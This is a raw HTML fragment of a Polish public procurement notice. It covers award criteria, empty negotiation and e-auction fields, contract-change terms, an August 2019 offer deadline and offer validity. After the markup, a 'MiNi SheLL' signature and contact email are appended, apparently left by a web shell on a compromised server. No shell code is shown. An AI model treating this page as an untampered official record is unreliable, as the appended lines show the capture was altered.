collapse;'>Termin płatnosci faktur </TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Norma emisji spalin </TD><TD style='border: 1px solid black;border-collapse: collapse;'>35,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1)	Istotne postanowienia, które zostaną wprowadzone do treści zawieranej umowy, zostały ujęte w załączniku do SIWZ - projekt umowy, stanowiącym integralną część specyfikacji (załącznik nr 10).</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-08-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">jezyk polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com